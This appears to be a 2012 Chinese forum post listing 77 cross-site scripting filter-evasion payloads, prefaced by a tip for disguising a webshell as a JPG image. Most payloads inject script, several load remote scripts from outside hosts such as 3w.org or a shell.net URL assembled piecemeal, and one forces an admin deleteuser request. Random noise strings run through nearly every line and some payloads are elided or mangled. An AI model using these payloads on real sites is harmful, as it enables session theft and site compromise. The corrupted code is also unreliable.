跨站图片shell* j+ V/ V O) }
XSS跨站代码 <script>alert("")</script>- P( b6 T8 D0 V; R/ H9 v
5 \/ W0 ~- Y2 ?& G
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
1 \/ J3 _) c) d! @: H# j& p. ?* j8 R, p/ M2 m
0 q7 H- K/ Z+ a5 A( J+ t9 C
% F# O! U2 [1 P* R) U. u1)普通的XSS JavaScript注入. F% I5 m6 z+ W$ L* g* b6 Q3 u
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 K8 C% K9 D. U1 F* ]. n8 S$ S( Y
4 Y' P: p. p5 `& k9 h(2)IMG标签XSS使用JavaScript命令
' o2 I% `) e ^) X<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; `* H* D' ? i" @8 e! L, M
9 } \& X* h7 X6 V* w% _(3)IMG标签无分号无引号
9 j [5 h0 o+ P q) U<IMG SRC=javascript:alert(‘XSS’)># f/ T, x7 p \
& N' x, g) d! g# T- Q1 z7 U(4)IMG标签大小写不敏感
% v$ t2 s, E+ L/ Y) P" n% ~<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" H2 ^4 ?0 d3 }
# c' Z7 U. f" t2 t" D1 [(5)HTML编码(必须有分号)9 S! X' k. [9 f
<IMG SRC=javascript:alert(“XSS”)>
9 j# W8 z8 f, I# b0 H Y( k# T1 d
, N* k8 V* R+ c: r. h, U8 P(6)修正缺陷IMG标签
: k% B: W" S" y" H3 n7 y1 x; ^<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 I& Z. d Z+ W) B' _4 S' j
) K% V- _3 H, A% m(7)formCharCode标签(计算器)3 Z4 `' c% @2 S% \( x
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>* a- Q& @. u1 @) Z* m: i
& B, q5 T/ c: N/ o: U1 h, g(8)UTF-8的Unicode编码(计算器)
6 U1 |0 m% i7 {# i! d( K& g) ]( w( d<IMG SRC=jav..省略..S')>
+ U5 ~% u( F0 R+ J9 s+ i% K) l
+ Z1 `2 K# e* x5 j3 c% B; |(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, t x n/ V+ `& }6 b, _: u, [# t<IMG SRC=jav..省略..S')>; J5 v, O. l' M. S+ J. H1 X
$ ]$ j: t3 Y+ W7 U; @: x(10)十六进制编码也是没有分号(计算器)
% c) [; r/ Z# l% Y$ n0 ]8 v+ w4 k<IMG SRC=java..省略..XSS')>0 B, t1 k3 O6 Q' j2 |
0 \! w$ x8 B I7 F
(11)嵌入式标签,将Javascript分开4 \! ^$ ^1 T2 r
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: T" i2 e8 N( `( E0 v' o0 W: ~0 x, Z" @) Y
(12)嵌入式编码标签,将Javascript分开6 h; W2 t$ [( N
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 P; n7 q4 \ X: H0 f- c
! W. m5 M+ X+ e% M, W(13)嵌入式换行符
7 A4 u8 J) o1 }& V<IMG SRC=”jav ascript:alert(‘XSS’);”>
: q Z) U* T2 _ z7 }% A8 U
7 V9 o* Q6 F6 ]8 |, }: L(14)嵌入式回车
8 I$ w( G& X, R1 A# u! L4 _<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 `! \0 p6 }9 g5 r4 W$ g1 F2 @+ J; u3 ]& D* @6 f
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
# s2 j( `9 p3 A% m) |<IMG SRC=”javascript:alert(‘XSS‘)”>
& I' u2 \/ [' P' B9 H3 T) E1 T: h5 t
5 @7 \" P F7 K) F) _0 D# [ M j(16)解决限制字符(要求同页面)0 l3 p/ O& J0 \& F" P0 M
<script>z=’document.’</script>0 Q# }" v2 A) _7 ?; \2 E/ X
<script>z=z+’write(“‘</script>1 {1 B6 j! y; y9 T$ A( v/ ?1 p
<script>z=z+’<script’</script>
/ [. a4 Q/ t& ]/ H<script>z=z+’ src=ht’</script>
: U9 e" R* b' x2 ^1 S<script>z=z+’tp://ww’</script>( D3 `) U" S% E% D2 E
<script>z=z+’w.shell’</script>; {6 q% k8 I6 W W) J* r* P
<script>z=z+’.net/1.’</script>
$ |4 U% O6 Q" i2 {' q+ J<script>z=z+’js></sc’</script>" g0 k; m% W1 i' x
<script>z=z+’ript>”)’</script>
+ m4 r# {6 y+ Q/ t0 R<script>eval_r(z)</script>
. a! h7 O6 ]9 t7 s, Q7 y; }+ u
# R5 `" l2 `( [# w1 x(17)空字符% @1 a& k. _4 l3 ?- a2 H
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out% i, L) Z" G$ F# B" o" U8 x
+ m7 s& J; b2 F* u6 b
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ i& N- e6 t6 s, h- H: I4 R. \perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out, d4 A+ X! h l# j1 Y
! k- ^- b. l( H) i+ i
(19)Spaces和meta前的IMG标签
% a+ f0 h' L4 ^- D! \7 ?* q<IMG SRC=” javascript:alert(‘XSS’);”>
& R5 J6 ^ z, ?) \) K" ?2 D5 ]/ |% L; ]
(20)Non-alpha-non-digit XSS
$ w; T( x; P8 s5 l) M3 ]<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 X2 |8 }$ f4 ~9 `
$ u l, z, S; D2 {# G$ ^(21)Non-alpha-non-digit XSS to 2
6 j( v) \: Q( s5 \8 b- E0 s" K<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: O% O* v3 G& R( ^/ s* A! x
9 I4 F1 V+ \0 i& `; f! K0 s(22)Non-alpha-non-digit XSS to 3
( N8 F0 D, T7 s& Z3 }% l<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 ~0 _+ v) L2 i% ?4 `8 E* C4 V. r3 d
0 v/ V: D8 V7 v3 W }: s: A(23)双开括号
3 _$ M/ ~5 ]! w& F1 s1 g- ~<<SCRIPT>alert(“XSS”);//<</SCRIPT>- }. C& B, u: j5 b3 p
( S0 j! c( n0 @) T* a% l9 o7 B1 H
(24)无结束脚本标记(仅火狐等浏览器)0 n3 K$ h2 K: B ], f
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ J3 u! `0 p& u- u, ^: w" d9 @
) p5 |6 j. ~" f% j& J(25)无结束脚本标记2
! \' v& {6 d" @! S& k3 _8 K<SCRIPT SRC=//3w.org/XSS/xss.js>, L v. ?6 R* a7 ^) ^; u5 K) p2 H% @
+ X Z, G2 i6 s d0 r(26)半开的HTML/JavaScript XSS! {0 t; ?- I( w! C% [7 J9 {+ |
<IMG SRC=”javascript:alert(‘XSS’)”& ]- ]5 ?/ j. J1 L3 F% c
+ J& p o5 c% Q(27)双开角括号
! i+ Q+ |* S2 J8 k1 t* A" k% X<iframe src=http://3w.org/XSS.html <
3 U( X0 H6 W6 T5 w
$ N/ M9 k* R% |0 v(28)无单引号 双引号 分号
9 ?: k$ [" o1 {# ~/ R- }<SCRIPT>a=/XSS/
. n6 E0 I7 F, }$ |$ S' ealert(a.source)</SCRIPT>; `/ n, e/ `5 w U' z! a" I
7 a+ l9 D+ T* o0 _8 H1 X- y8 |(29)换码过滤的JavaScript. `% e+ ^( k+ A( S" T6 \! N
\”;alert(‘XSS’);//* i5 O/ ?5 K/ C* @4 ?* r
# G" ^7 x; J( G( ?' E: H$ d2 ] N
(30)结束Title标签1 I: @* z, D8 A
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( d8 r9 }2 K: z$ S) c) T
3 i+ p' {7 R& x3 y(31)Input Image
- U: l0 G, j* v( [, w) j' m* h- }<INPUT SRC=”javascript:alert(‘XSS’);”>% Q, R4 b8 }2 [1 S+ r2 ^) C8 X
3 f$ }' k5 A( V9 O4 g; L
(32)BODY Image
7 U, |* |. l5 D. v; Y6 M<BODY BACKGROUND=”javascript:alert(‘XSS’)”>2 z. T" @: k( P/ }
$ K7 g. _/ I8 _9 f9 |
(33)BODY标签) j' {2 t: u" n- ^6 _7 M
<BODY(‘XSS’)>: \* W! ?+ E0 G* ^5 S* L( N$ [" _
/ A3 q6 E' z) @% z6 {- X( G5 ]! [6 O
(34)IMG Dynsrc
& x+ V0 ?2 S0 d1 B<IMG DYNSRC=”javascript:alert(‘XSS’)”># x5 {8 q. ^8 B4 W- T
# f! y0 m" [- D; E" P5 Q: d
(35)IMG Lowsrc* K( r% ~7 g4 L/ }$ Z
<IMG LOWSRC=”javascript:alert(‘XSS’)”>$ l, [4 o* e6 H. e
. ~5 d- t. p# ~6 `9 A: I(36)BGSOUND
3 O* f; O! `; R* T0 Z% o9 C, H<BGSOUND SRC=”javascript:alert(‘XSS’);”>
2 q9 I' j: k: u5 {
9 J6 j t. C1 q" F8 M: c(37)STYLE sheet
' u/ x, C7 g$ o9 `/ B<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 a: \" z' W2 X6 _6 j& I ^" |" {1 P S8 G& Y- k1 E6 s* V/ \( p
(38)远程样式表
) O% C9 o& o" I; [9 d$ H5 N% U<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
* \5 \+ u. f% R! C+ B( Y8 j- N/ U3 ?
(39)List-style-image(列表式)3 y5 z1 v1 J1 H# X/ L' ?
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* Y4 i' ~8 y$ S* b
; ~1 @$ Q3 p+ r( ?- ]1 U1 O; @(40)IMG VBscript
8 h1 f& x$ D4 r4 T4 j( F7 G% _<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 D/ a0 r1 P2 M# J: A% i1 a5 i9 E% i- U3 R! r f ~3 P
(41)META链接url. o0 O7 _7 V* D f1 c
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
. z9 F! Q2 | k) H# ?( _. W$ J% _ m8 S" Z% k3 q4 A
(42)Iframe5 e6 d8 a I; W1 }6 k" E, c# [
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>) u) G2 P0 ]: I: u: e
(43)Frame
/ |/ ?( W! R, I% j<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>$ L5 [& |) N# X% I+ l+ v
4 v3 _: @7 K8 X( f(44)Table
1 I& J. ~1 G" q( ~<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>& J5 j2 _0 }, O
+ a/ \1 ^4 J$ Z5 x# G& g(45)TD4 T" U- u2 A# p$ L7 l
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
W7 f' g' A, O, c# u
: T. h6 `% b% A. n/ @(46)DIV background-image! A/ g. R, M) T* T# v
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
h5 [' W+ q; q. ^9 Y. I7 a7 W. ^
, R5 v4 E6 ]" f0 V& l# N) v8 k(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ Q/ ^6 Y' b! r! U, Y* P% y<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
& A, K* y# n) Q% J5 O; Z- g% W Y" Z) r0 h6 g" L8 P2 G
(48)DIV expression
8 I! ~6 I- H @$ _' g<DIV STYLE=”width: expression_r(alert(‘XSS’));”>. g. D, m f: a9 q* j4 Q
8 a8 \6 X, H6 y2 [(49)STYLE属性分拆表达
I+ k( k( ~5 P3 E( A0 s<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! g' B1 n0 @4 c. U) H v& c- [7 P, ^* p" s
(50)匿名STYLE(组成:开角号和一个字母开头)
0 j8 M5 Q e" |# R9 l<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
- }4 |" U" }, |6 l: ~/ g7 K+ Y6 L7 A
(51)STYLE background-image
9 a4 `. A, i: k: s<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
7 I' V2 g$ H! c% I* ^! ^
% ] [ W( M6 h( e" h$ t, o7 D2 Y(52)IMG STYLE方式
1 B8 S1 X$ k9 ~) m# x$ a' ]exppression(alert(“XSS”))’>0 O: }: q$ ]& i C
7 K J5 M4 N2 W% C0 b8 d
(53)STYLE background2 B6 f" p* Q; Y0 O+ b
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
0 z4 z5 E/ u5 C. H$ Z2 T1 [* G W$ d9 F
(54)BASE: v3 h9 r1 n* C/ E1 u1 `& U
<BASE HREF=”javascript:alert(‘XSS’);//”>" X8 z: o9 s( k6 b1 @
4 J7 @. e& l2 V7 E(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS, I0 c* L. `" S U. \& d* }, Y
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
$ J8 k( s% d. k: ]- l0 R0 M6 q+ R+ `8 `# l0 T
(56)在flash中使用ActionScrpt可以混进你XSS的代码! t& N; a& v2 K$ a0 W( g; j K
a=”get”;7 N3 M5 p9 A$ b- f+ m6 O+ M1 c* d9 Q
b=”URL(\”";) {+ B3 n8 O% R! W* Y+ C6 n$ h' I1 q
c=”javascript:”;" W7 y3 _1 t, d1 C$ G
d=”alert(‘XSS’);\”)”;
, { P9 [$ V0 M/ b; V. |& [eval_r(a+b+c+d);
; ]1 w% W* y' }$ N- h# W+ A @; [# t0 q7 Q& u; `
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上5 P! d* O8 ~; w S7 q
<HTML xmlns:xss>
, F8 i/ H. a8 Q# g) f7 t<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
7 { \( d+ [6 i5 P( |+ F: o3 r$ A<xss:xss>XSS</xss:xss>
) G N8 }6 `: Z- G7 ^) V) z5 w</HTML>
; Q8 ^. N' X; ~( Y
9 D: J4 M c- z. O(58)如果过滤了你的JS你可以在图片里添加JS代码来利用3 d+ D* y1 `5 i3 { y
<SCRIPT SRC=””></SCRIPT> m- X( p3 s2 o: y( h/ R( ?4 N( p; O
+ ]; W% D/ E' ~(59)IMG嵌入式命令,可执行任意命令
- p% S, J$ s0 Q: Y& ~8 H<IMG SRC=”http://www.XXX.com/a.php?a=b”>9 n& m. |; U+ d* Y" ]% I% B( d
: U9 k! l( e1 X: E6 Y(60)IMG嵌入式命令(a.jpg在同服务器)) y9 H$ c# v5 V% k1 n& g
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 g8 u* ~8 O7 U9 u3 R
- j, E' N; T# c# h% t3 F(61)绕符号过滤
! n- g# x. _9 R$ W<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
; z4 h- A* |9 }* r/ O7 c* P
2 J2 b% ^& q$ I: o/ L(62) R, i% a* N9 [( b. w) g
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 O( u% s& Y; x; ^0 Y. a
' ~; Z s( f$ f8 X y% K(63)3 M$ V+ z) }- p2 {% g0 o% H
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
" [. h- }0 v4 a9 }9 F. l I3 D# d8 E1 I* l( `$ P/ V. U* U r0 @+ ?
(64)( C4 C. g8 ^% R" n& T: S5 D
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
{4 p# j. p8 L5 f% n5 q% b7 W
% G, ~5 w7 \6 f* R; k(65)3 r8 ?( L m1 i
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
/ W% h- u& Q' x$ }. {/ G3 J* Q% F, X
3 `- Z$ v, H+ u, L" {(66)
: j7 [( k3 Y0 e2 Y<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
- d3 ], P# {% g6 P. l- g
4 ~3 E' s; s' O0 T4 e0 N(67)2 g8 w/ j% _$ v1 L' J/ q/ M% _
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
' T, _2 ^; ?; \9 F7 s# F% v/ f7 O. C8 g3 f
(68)URL绕行& f0 \* L* q# a6 I4 f
<A HREF=”http://127.0.0.1/”>XSS</A>
; l: n. V- l- S3 Y" |8 p- j9 P3 P% L4 k B
(69)URL编码9 }2 g' @2 w4 ^) i- K# F; s% [/ y9 ~
<A HREF=”http://3w.org”>XSS</A>2 K; }+ I3 j4 ~7 y
8 t) q. u( G3 m" g
(70)IP十进制 G/ B. k1 V7 u- C
<A HREF=”http://3232235521″>XSS</A>
. b# H( W7 e6 |, I6 h
3 x( \: I( Z2 ]' P(71)IP十六进制
3 J- `3 s) D4 |! E<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>2 }6 n9 W+ A" y. H. ]
" [& [4 s# ?8 t( P! O
(72)IP八进制
& Z1 y+ k+ R4 v* B# D6 z- o R' }<A HREF=”http://0300.0250.0000.0001″>XSS</A>0 E, x9 H# n9 k: S
% h# u2 a% l, n9 i7 k(73)混合编码
; Q) g' @% H2 z( i1 k<A HREF=”h
& R. X. @. h2 { T Utt p://6 6.000146.0×7.147/”">XSS</A>( M( V* ?, d" r* x( V
* z/ F, s" m1 `. p: j) {
(74)节省[http:]1 Q6 ?, c9 I# g9 X* l
<A HREF=”//www.google.com/”>XSS</A>$ M# R4 ]' P' X9 C4 o' Q
' ]& M# L7 `, z- s6 V' f1 v, a* U(75)节省[www]
- t: P8 p$ j5 u( r r; D' Z<A HREF=”http://google.com/”>XSS</A>
0 [) l2 \8 J8 s9 n' E& Y4 k6 K7 l g6 r) Y/ u
(76)绝对点绝对DNS5 C1 A E: m- x
<A HREF=”http://www.google.com./”>XSS</A>8 r! W2 E7 |' ]1 k( @' {
# ]3 q0 U6 R2 f' }8 E
(77)javascript链接
& u4 \" X2 t4 C6 {" f( h7 ]8 n<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>, o. o/ R2 |: [3 C4 h; O r
|
发表于 2012-9-13 17:04:56
收藏
支持
反对